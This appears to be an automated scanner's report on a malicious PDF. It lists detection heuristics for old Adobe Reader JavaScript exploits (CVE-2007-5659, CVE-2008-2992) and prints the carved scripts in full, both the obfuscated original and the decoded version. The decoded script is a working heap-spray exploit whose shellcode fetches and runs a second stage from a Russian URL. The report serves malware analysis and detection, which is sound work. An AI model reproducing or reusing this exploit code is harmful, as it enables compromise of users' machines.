MALICIOUS
378
Risk Score
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 9
-
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
-
util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
-
JavaScript action low 4 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Obfuscated multi-stage PDF JavaScript heap-spray exploit critical PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAYPDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
var A34l = eval(B34l); -
PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URLDecoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://lxenia.ru/wp-image/load.php?stat=Windows Referenced by PDF JavaScript
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0013_001.js |
pdf-javascript-stream | PDF /JS object 13 at offset 0x3D7 | 14011 bytes |
SHA-256: 3328389c2185ae1862b7968b2cdf6f70310fe6db057e14105f229c1b93dfdb9d |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 3 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var B34l = "1e234v567a89l0";
B34l = B34l.replace(/[\+1234567890]/g, "");
var A34l = eval(B34l);
var s = "32.102.117.110.99.116.105.111.110.32.98.49.50.51.53.98.67.51.52.108.40.98.49.50.51.53.98.68.51.52.108.44.32.98.49.50.51.53.98.87.51.52.108.41.123.32.119.104.105.108.101.32.40.98.49.50.51.53.98.68.51.52.108.46.108.101.110.103.116.104.42.50.60.98.49.50.51.53.98.87.51.52.108.41.123.98.49.50.51.53.98.68.51.52.108.32.43.61.32.98.49.50.51.53.98.68.51.52.108.59.125.32.98.49.50.51.53.98.68.51.52.108.32.61.32.98.49.50.51.53.98.68.51.52.108.46.115.117.98.115.116.114.105.110.103.40.48.44.98.49.50.51.53.98.87.51.52.108.47.50.41.59.32.114.101.116.117.114.110.32.98.49.50.51.53.98.68.51.52.108.59.32.125.32.102.117.110.99.116.105.111.110.32.98.49.50.51.53.98.69.51.52.108.40.110.117.109.44.32.99.111.110.116.101.110.116.41.123.32.118.97.114.32.122.32.61.32.34.34.59.32.102.111.114.32.40.118.97.114.32.105.32.61.32.48.59.32.105.32.60.32.110.117.109.59.32.105.43.43.41.123.32.122.32.43.61.32.99.111.110.116.101.110.116.46.116.111.83.116.114.105.110.103.40.41.59.32.125.32.114.101.116.117.114.110.32.122.59.32.125.32.118.97.114.32.98.49.50.51.53.98.70.51.52.108.32.61.32.97.112.112.46.118.105.101.119.101.114.86.101.114.115.105.111.110.46.116.111.83.116.114.105.110.103.40.41.59.32.98.49.50.51.53.98.70.51.52.108.32.61.32.98.49.50.51.53.98.70.51.52.108.46.114.101.112.108.97.99.101.40.47.92.68.47.103.44.34.34.41.59.32.118.97.114.32.98.49.50.51.53.98.71.51.52.108.32.61.32.110.101.119.32.65.114.114.97.121.40.98.49.50.51.53.98.70.51.52.108.46.99.104.97.114.65.116.40.48.41.44.98.49.50.51.53.98.70.51.52.108.46.99.104.97.114.65.116.40.49.41.44.98.49.50.51.53.98.70.51.52.108.46.99.104.97.114.65.116.40.50.41.41.59.32.105.102.32.40.98.49.50.51.53.98.71.51.52.108.91.48.93.32.61.61.32.56.32.38.38.32.98.49.50.51.53.98.71.51.52.108.91.49.93.32.61.61.32.49.32.38.38.32.98.49.50.51.53.98.71.51.52.108.91.50.93.32.61.61.32.50.41.123.32.118.97.114.32.98.49.50.51.53.98.75.51.52.108.32.61.32.117.110.101.115.99.97.112.101.40.34.37.117.67.48.51.51.37.117.56.66.54.52.37.117.51.48.52.48.37.117.48.67.55.56.37.117.52.48.56.66.37.117.56.66.48.67.37.117.49.67.55.48.37.117.56.66.65.68.37.117.48.56.53.56.37.117.48.57.69.66.37.117.52.48.56.66.37.117.56.68.51.52.37.117.55.67.52.48.37.117.53.56.56.66.37.117.54.65.51.67.37.117.53.65.52.52.37.117.69.50.68.49.37.117.69.50.50.66.37.117.69.67.56.66.37.117.52.70.69.66.37.117.53.50.53.65.37.117.69.65.56.51.37.117.56.57.53.54.37.117.48.52.53.53.37.117.53.55.53.54.37.117.55.51.56.66.37.117.56.66.51.67.37.117.51.51.55.52.37.117.48.51.55.56.37.117.53.54.70.51.37.117.55.54.56.66.37.117.48.51.50.48.37.117.51.51.70.51.37.117.52.57.67.57.37.117.52.49.53.48.37.117.51.51.65.68.37.117.51.54.70.70.37.117.66.69.48.70.37.117.48.51.49.52.37.117.70.50.51.56.37.117.48.56.55.52.37.117.67.70.67.49.37.117.48.51.48.68.37.117.52.48.70.65.37.117.69.70.69.66.37.117.51.66.53.56.37.117.55.53.70.56.37.117.53.69.69.53.37.117.52.54.56.66.37.117.48.51.50.52.37.117.54.54.67.51.37.117.48.67.56.66.37.117.56.66.52.56.37.117.49.67.53.54.37.117.68.51.48.51.37.117.48.52.56.66.37.117.48.51.56.65.37.117.53.70.67.51.37.117.53.48.53.69.37.117.56.68.67.51.37.117.48.56.55.68.37.117.53.50.53.55.37.117.51.51.66.56.37.117.56.65.67.65.37.117.69.56.53.66.37.117.70.70.65.50.37.117.70.70.70.70.37.117.67.48.51.50.37.117.70.55.56.66.37.117.65.69.70.50.37.117.66.56.52.70.37.117.50.69.54.53.37.117.55.56.54.53.37.117.54.54.65.66.37.117.54.54.57.56.37.117.66.48.65.66.37.117.56.65.54.67.37.117.57.56.69.48.37.117.54.56.53.48.37.117.54.69.54.70.37.117.54.52.50.69.37.117.55.53.54.56.37.117.54.67.55.50.37.117.53.52.54.68.37.117.56.69.66.56.37.117.48.69.52.69.37.117.70.70.69.67.37.117.48.52.53.53.37.117.53.48.57.51.37.117.67.48.51.51.37.117.53.48.53.48.37.117.56.66.53.54.37.117.48.52.53.53.37.117.67.50.56.51.37.117.56.51.55.70.37.117.51.49.67.50.37.117.53.48.53.50.37.117.51.54.66.56.37.117.50.70.49.65.37.117.70.70.55.48.37.117.48.52.53.53.37.117.51.51.53.66.37.117.53.55.70.70.37.117.66.56.53.54.37.117.70.69.57.56.37.117.48.69.56.65.37.117.53.53.70.70.37.117.53.55.48.52.37.117.69.70.66.56.37.117.69.48.67.69.37.117.70.70.54.48.37.117.48.52.53.53.37.117.55.52.54.56.37.117.55.48.55.52.37.117.50.70.51.65.37.117.54.67.50.70.37.117.54.53.55.56.37.117.54.57.54.69.37.117.50.69.54.49.37.117.55.53.55.50.37.117.55.55.50.70.37.117.50.68.55.48.37.117.54.68.54.57.37.117.54.55.54.49.37.117.50.70.54.53.37.117.54.70.54.67.37.117.54.52.54.49.37.117.55.48.50.69.37.117.55.48.54.56.37.117.55.51.51.70.37.117.54.49.55.52.37.117.51.68.55.52.37.117.54.57.53.55.37.117.54.52.54.69.37.117.55.55.54.70.37.117.50.48.55.51.37.117.53.48.53.56.37.117.52.57.55.67.37.117.55.52.54.69.37.117.55.50.54.53.37.117.54.53.54.69.37.117.50.48.55.52.37.117.55.56.52.53.37.117.54.67.55.48.37.117.55.50.54.70.37.117.55.50.54.53.37.117.51.54.50.48.37.117.51.48.50.69.37.117.53.50.55.67.37.117.55.67.53.53.37.117.51.49.51.57.37.117.51.55.50.69.37.117.50.69.51.55.37.117.51.51.51.50.37.117.50.69.51.56.37.117.51.49.51.55.34.41.59.32.118.97.114.32.98.49.50.51.53.98.67.51.52.108.32.61.32.117.110.101.115.99.97.112.101.40.34.37.117.48.65.48.65.37.117.48.65.48.65.34.41.59.32.118.97.114.32.98.49.50.51.53.98.68.51.52.108.32.61.32.50.48.59.32.118.97.114.32.98.49.50.51.53.98.72.51.52.108.32.61.32.98.49.50.51.53.98.68.51.52.108.43.98.49.50.51.53.98.75.51.52.108.46.108.101.110.103.116.104.59.32.119.104.105.108.101.32.40.98.49.50.51.53.98.67.51.52.108.46.108.101.110.103.116.104.32.60.32.98.49.50.51.53.98.72.51.52.108.41.32.98.49.50.51.53.98.67.51.52.108.32.43.61.32.98.49.50.51.53.98.67.51.52.108.59.32.118.97.114.32.98.49.50.51.53.98.76.51.52.108.32.61.32.98.49.50.51.53.98.67.51.52.108.46.115.117.98.115.116.114.105.110.103.40.48.44.32.98.49.50.51.53.98.72.51.52.108.41.59.32.118.97.114.32.98.49.50.51.53.98.77.51.52.108.32.61.32.98.49.50.51.53.98.67.51.52.108.46.115.117.98.115.116.114.105.110.103.40.48.44.32.98.49.50.51.53.98.67.51.52.108.46.108.101.110.103.116.104.32.45.32.98.49.50.51.53.98.72.51.52.108.41.59.32.119.104.105.108.101.32.40.98.49.50.51.53.98.77.51.52.108.46.108.101.110.103.116.104.32.43.32.98.49.50.51.53.98.72.51.52.108.32.60.32.48.120.54.48.48.48.48.41.32.98.49.50.51.53.98.77.51.52.108.61.98.49.50.51.53.98.77.51.52.108.43.98.49.50.51.53.98.77.51.52.108.43.98.49.50.51.53.98.76.51.52.108.59.32.118.97.114.32.98.49.50.51.53.98.78.51.52.108.32.61.32.110.101.119.32.65.114.114.97.121.40.41.59.32.102.111.114.32.40.98.49.50.51.53.98.79.51.52.108.32.61.32.48.59.32.98.49.50.51.53.98.79.51.52.108.32.60.32.49.50.48.48.59.32.98.49.50.51.53.98.79.51.52.108.43.43.41.123.32.98.49.50.51.53.98.78.51.52.108.91.98.49.50.51.53.98.79.51.52.108.93.32.61.32.98.49.50.51.53.98.77.51.52.108.32.43.32.98.49.50.51.53.98.75.51.52.108.32.125.32.118.97.114.32.98.49.50.51.53.98.80.51.52.108.32.61.32.49.50.32.43.32.98.49.50.51.53.98.69.51.52.108.40.49.56.44.32.57.41.32.43.32.98.49.50.51.53.98.69.51.52.108.40.50.55.54.44.32.56.41.59.32.118.97.114.32.98.49.50.51.53.98.65.51.113.73.111.32.61.32.34.49.50.37.51.52.64.53.64.48.64.48.64.48.49.50.51.102.64.34.59.32.98.49.50.51.53.98.65.51.113.73.111.32.61.32.98.49.50.51.53.98.65.51.113.73.111.46.114.101.112.108.97.99.101.40.47.91.49.50.51.64.93.47.103.44.32.34.34.41.59.32.117.116.105.108.46.112.114.105.110.116.102.40.98.49.50.51.53.98.65.51.113.73.111.44.98.49.50.51.53.98.80.51.52.108.41.59.32.125.32.101.108.115.101.32.123.32.118.97.114.32.98.49.50.51.53.98.75.51.52.108.32.61.32.117.110.101.115.99.97.112.101.40.34.37.117.67.48.51.51.37.117.56.66.54.52.37.117.51.48.52.48.37.117.48.67.55.56.37.117.52.48.56.66.37.117.56.66.48.67.37.117.49.67.55.48.37.117.56.66.65.68.37.117.48.56.53.56.37.117.48.57.69.66.37.117.52.48.56.66.37.117.56.68.51.52.37.117.55.67.52.48.37.117.53.56.56.66.37.117.54.65.51.67.37.117.53.65.52.52.37.117.69.50.68.49.37.117.69.50.50.66.37.117.69.67.56.66.37.117.52.70.69.66.37.117.53.50.53.65.37.117.69.65.56.51.37.117.56.57.53.54.37.117.48.52.53.53.37.117.53.55.53.54.37.117.55.51.56.66.37.117.56.66.51.67.37.117.51.51.55.52.37.117.48.51.55.56.37.117.53.54.70.51.37.117.55.54.56.66.37.117.48.51.50.48.37.117.51.51.70.51.37.117.52.57.67.57.37.117.52.49.53.48.37.117.51.51.65.68.37.117.51.54.70.70.37.117.66.69.48.70.37.117.48.51.49.52.37.117.70.50.51.56.37.117.48.56.55.52.37.117.67.70.67.49.37.117.48.51.48.68.37.117.52.48.70.65.37.117.69.70.69.66.37.117.51.66.53.56.37.117.55.53.70.56.37.117.53.69.69.53.37.117.52.54.56.66.37.117.48.51.50.52.37.117.54.54.67.51.37.117.48.67.56.66.37.117.56.66.52.56.37.117.49.67.53.54.37.117.68.51.48.51.37.117.48.52.56.66.37.117.48.51.56.65.37.117.53.70.67.51.37.117.53.48.53.69.37.117.56.68.67.51.37.117.48.56.55.68.37.117.53.50.53.55.37.117.51.51.66.56.37.117.56.65.67.65.37.117.69.56.53.66.37.117.70.70.65.50.37.117.70.70.70.70.37.117.67.48.51.50.37.117.70.55.56.66.37.117.65.69.70.50.37.117.66.56.52.70.37.117.50.69.54.53.37.117.55.56.54.53.37.117.54.54.65.66.37.117.54.54.57.56.37.117.66.48.65.66.37.117.56.65.54.67.37.117.57.56.69.48.37.117.54.56.53.48.37.117.54.69.54.70.37.117.54.52.50.69.37.117.55.53.54.56.37.117.54.67.55.50.37.117.53.52.54.68.37.117.56.69.66.56.37.117.48.69.52.69.37.117.70.70.69.67.37.117.48.52.53.53.37.117.53.48.57.51.37.117.67.48.51.51.37.117.53.48.53.48.37.117.56.66.53.54.37.117.48.52.53.53.37.117.67.50.56.51.37.117.56.51.55.70.37.117.51.49.67.50.37.117.53.48.53.50.37.117.51.54.66.56.37.117.50.70.49.65.37.117.70.70.55.48.37.117.48.52.53.53.37.117.51.51.53.66.37.117.53.55.70.70.37.117.66.56.53.54.37.117.70.69.57.56.37.117.48.69.56.65.37.117.53.53.70.70.37.117.53.55.48.52.37.117.69.70.66.56.37.117.69.48.67.69.37.117.70.70.54.48.37.117.48.52.53.53.37.117.55.52.54.56.37.117.55.48.55.52.37.117.50.70.51.65.37.117.54.67.50.70.37.117.54.53.55.56.37.117.54.57.54.69.37.117.50.69.54.49.37.117.55.53.55.50.37.117.55.55.50.70.37.117.50.68.55.48.37.117.54.68.54.57.37.117.54.55.54.49.37.117.50.70.54.53.37.117.54.70.54.67.37.117.54.52.54.49.37.117.55.48.50.69.37.117.55.48.54.56.37.117.55.51.51.70.37.117.54.49.55.52.37.117.51.68.55.52.37.117.54.57.53.55.37.117.54.52.54.69.37.117.55.55.54.70.37.117.50.48.55.51.37.117.53.48.53.56.37.117.52.57.55.67.37.117.55.52.54.69.37.117.55.50.54.53.37.117.54.53.54.69.37.117.50.48.55.52.37.117.55.56.52.53.37.117.54.67.55.48.37.117.55.50.54.70.37.117.55.50.54.53.37.117.51.54.50.48.37.117.51.48.50.69.37.117.53.50.55.67.37.117.55.67.53.53.37.117.51.49.51.57.37.117.51.55.50.69.37.117.50.69.51.55.37.117.51.51.51.50.37.117.50.69.51.56.37.117.51.49.51.55.34.41.59.32.118.97.114.32.98.49.50.51.53.98.65.57.51.73.119.111.110.81.32.61.32.34.64.48.64.120.64.48.64.99.64.48.64.99.64.48.64.99.64.48.64.99.64.34.59.32.98.49.50.51.53.98.65.57.51.73.119.111.110.81.32.61.32.98.49.50.51.53.98.65.57.51.73.119.111.110.81.46.114.101.112.108.97.99.101.40.47.91.64.93.47.103.44.32.34.34.41.59.32.118.97.114.32.98.49.50.51.53.98.66.57.51.73.119.111.110.81.32.61.32.34.64.48.64.120.64.52.64.48.64.64.48.64.64.48.64.64.48.64.48.64.34.59.32.98.49.50.51.53.98.66.57.51.73.119.111.110.81.32.61.32.98.49.50.51.53.98.66.57.51.73.119.111.110.81.46.114.101.112.108.97.99.101.40.47.91.64.93.47.103.44.32.34.34.41.59.32.118.97.114.32.98.49.50.51.53.98.81.51.52.108.32.61.32.110.101.119.32.65.114.114.97.121.40.41.59.32.118.97.114.32.98.49.50.51.53.98.80.51.52.108.32.61.32.98.49.50.51.53.98.65.57.51.73.119.111.110.81.59.32.118.97.114.32.98.49.50.51.53.98.77.51.52.108.32.61.32.98.49.50.51.53.98.66.57.51.73.119.111.110.81.59.32.118.97.114.32.98.49.50.51.53.98.78.51.52.108.32.61.32.98.49.50.51.53.98.75.51.52.108.46.108.101.110.103.116.104.32.42.32.50.59.32.118.97.114.32.98.49.50.51.53.98.87.51.52.108.32.61.32.98.49.50.51.53.98.77.51.52.108.32.45.32.40.98.49.50.51.53.98.78.51.52.108.43.48.120.51.56.41.59.32.118.97.114.32.98.49.50.51.53.98.81.57.50.83.105.108.78.32.61.32.34.64.37.64.117.64.57.64.48.64.57.64.48.64.37.64.117.64.57.64.48.64.57.64.48.64.34.59.32.98.49.50.51.53.98.81.57.50.83.105.108.78.32.61.32.98.49.50.51.53.98.81.57.50.83.105.108.78.46.114.101.112.108.97.99.101.40.47.91.64.93.47.103.44.32.34.34.41.59.32.118.97.114.32.98.49.50.51.53.98.68.51.52.108.32.61.32.117.110.101.115.99.97.112.101.40.98.49.50.51.53.98.81.57.50.83.105.108.78.41.59.32.98.49.50.51.53.98.68.51.52.108.32.61.32.98.49.50.51.53.98.67.51.52.108.40.98.49.50.51.53.98.68.51.52.108.44.32.98.49.50.51.53.98.87.51.52.108.41.59.32.118.97.114.32.98.49.50.51.53.98.76.51.52.108.32.61.32.40.98.49.50.51.53.98.80.51.52.108.32.45.32.98.49.50.51.53.98.66.57.51.73.119.111.110.81.41.47.98.49.50.51.53.98.77.51.52.108.59.32.102.111.114.32.40.118.97.114.32.98.49.50.51.53.98.67.57.51.73.119.111.110.81.61.48.59.98.49.50.51.53.98.67.57.51.73.119.111.110.81.60.98.49.50.51.53.98.76.51.52.108.59.98.49.50.51.53.98.67.57.51.73.119.111.110.81.43.43.41.123.32.98.49.50.51.53.98.81.51.52.108.91.98.49.50.51.53.98.67.57.51.73.119.111.110.81.93.32.61.32.98.49.50.51.53.98.68.51.52.108.32.43.32.98.49.50.51.53.98.75.51.52.108.59.32.125.32.118.97.114.32.98.49.50.51.53.98.69.105.111.57.53.69.105.110.65.32.61.32.34.64.37.64.117.64.48.64.99.64.48.64.99.64.37.64.117.64.48.64.99.64.48.64.99.64.34.59.32.98.49.50.51.53.98.69.105.111.57.53.69.105.110.65.32.61.32.98.49.50.51.53.98.69.105.111.57.53.69.105.110.65.46.114.101.112.108.97.99.101.40.47.91.64.93.47.103.44.32.34.34.41.59.32.118.97.114.32.98.49.50.51.53.98.79.51.52.108.32.61.32.117.110.101.115.99.97.112.101.40.98.49.50.51.53.98.69.105.111.57.53.69.105.110.65.41.59.32.119.104.105.108.101.40.98.49.50.51.53.98.79.51.52.108.46.108.101.110.103.116.104.32.60.32.52.52.57.53.50.41.32.98.49.50.51.53.98.79.51.52.108.32.43.61.32.98.49.50.51.53.98.79.51.52.108.59.32.116.104.105.115.46.99.111.108.108.97.98.83.116.111.114.101.32.61.32.67.111.108.108.97.98.46.99.111.108.108.101.99.116.69.109.97.105.108.73.110.102.111.40.123.115.117.98.106.58.32.34.34.44.109.115.103.58.32.98.49.50.51.53.98.79.51.52.108.125.41.59.32.125.32".replace(/[A-Za-z]/g,function (c){return String.fromCharCode((((c = c.charCodeAt(0)) & 223) - 52) % 26 + (c & 32) + 65);}).split(".");
var B34l = "";
for (var i=0; i<s.length; i++){ B34l += String.fromCharCode(s[i]); }
function uSQXcfcd2(){
A34l(B34l);
}
|
|||
numeric_charcode_stage_000.js |
deobfuscated-js | numeric char-code string decoded JavaScript at offset 0x445 | 4260 bytes |
SHA-256: f4481ca0b14254d49b6f193e48ba4ab22faeb3fa22184d39f4e0c2787ab831d2 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 5 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function b1235bC34l(b1235bD34l, b1235bW34l){ while (b1235bD34l.length*2<b1235bW34l){b1235bD34l += b1235bD34l;} b1235bD34l = b1235bD34l.substring(0,b1235bW34l/2); return b1235bD34l; } function b1235bE34l(num, content){ var z = ""; for (var i = 0; i < num; i++){ z += content.toString(); } return z; } var b1235bF34l = app.viewerVersion.toString(); b1235bF34l = b1235bF34l.replace(/\D/g,""); var b1235bG34l = new Array(b1235bF34l.charAt(0),b1235bF34l.charAt(1),b1235bF34l.charAt(2)); if (b1235bG34l[0] == 8 && b1235bG34l[1] == 1 && b1235bG34l[2] == 2){ var b1235bK34l = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u6C2F%u6578%u696E%u2E61%u7572%u772F%u2D70%u6D69%u6761%u2F65%u6F6C%u6461%u702E%u7068%u733F%u6174%u3D74%u6957%u646E%u776F%u2073%u5058%u497C%u746E%u7265%u656E%u2074%u7845%u6C70%u726F%u7265%u3620%u302E%u527C%u7C55%u3139%u372E%u2E37%u3332%u2E38%u3137"); var b1235bC34l = unescape("%u0A0A%u0A0A"); var b1235bD34l = 20; var b1235bH34l = b1235bD34l+b1235bK34l.length; while (b1235bC34l.length < b1235bH34l) b1235bC34l += b1235bC34l; var b1235bL34l = b1235bC34l.substring(0, b1235bH34l); var b1235bM34l = b1235bC34l.substring(0, b1235bC34l.length - b1235bH34l); while (b1235bM34l.length + b1235bH34l < 0x60000) b1235bM34l=b1235bM34l+b1235bM34l+b1235bL34l; var b1235bN34l = new Array(); for (b1235bO34l = 0; b1235bO34l < 1200; b1235bO34l++){ b1235bN34l[b1235bO34l] = b1235bM34l + b1235bK34l } var b1235bP34l = 12 + b1235bE34l(18, 9) + b1235bE34l(276, 8); var b1235bA3qIo = "12%34@5@0@0@0123f@"; b1235bA3qIo = b1235bA3qIo.replace(/[123@]/g, ""); util.printf(b1235bA3qIo,b1235bP34l); } else { var b1235bK34l = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u6C2F%u6578%u696E%u2E61%u7572%u772F%u2D70%u6D69%u6761%u2F65%u6F6C%u6461%u702E%u7068%u733F%u6174%u3D74%u6957%u646E%u776F%u2073%u5058%u497C%u746E%u7265%u656E%u2074%u7845%u6C70%u726F%u7265%u3620%u302E%u527C%u7C55%u3139%u372E%u2E37%u3332%u2E38%u3137"); var b1235bA93IwonQ = "@0@x@0@c@0@c@0@c@0@c@"; b1235bA93IwonQ = b1235bA93IwonQ.replace(/[@]/g, ""); var b1235bB93IwonQ = "@0@x@4@0@@0@@0@@0@0@"; b1235bB93IwonQ = b1235bB93IwonQ.replace(/[@]/g, ""); var b1235bQ34l = new Array(); var b1235bP34l = b1235bA93IwonQ; var b1235bM34l = b1235bB93IwonQ; var b1235bN34l = b1235bK34l.length * 2; var b1235bW34l = b1235bM34l - (b1235bN34l+0x38); var b1235bQ92SilN = "@%@u@9@0@9@0@%@u@9@0@9@0@"; b1235bQ92SilN = b1235bQ92SilN.replace(/[@]/g, ""); var b1235bD34l = unescape(b1235bQ92SilN); b1235bD34l = b1235bC34l(b1235bD34l, b1235bW34l); var b1235bL34l = (b1235bP34l - b1235bB93IwonQ)/b1235bM34l; for (var b1235bC93IwonQ=0;b1235bC93IwonQ<b1235bL34l;b1235bC93IwonQ++){ b1235bQ34l[b1235bC93IwonQ] = b1235bD34l + b1235bK34l; } var b1235bEio95EinA = "@%@u@0@c@0@c@%@u@0@c@0@c@"; b1235bEio95EinA = b1235bEio95EinA.replace(/[@]/g, ""); var b1235bO34l = unescape(b1235bEio95EinA); while(b1235bO34l.length < 44952) b1235bO34l += b1235bO34l; this.collabStore = Collab.collectEmailInfo({subj: "",msg: b1235bO34l}); }
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.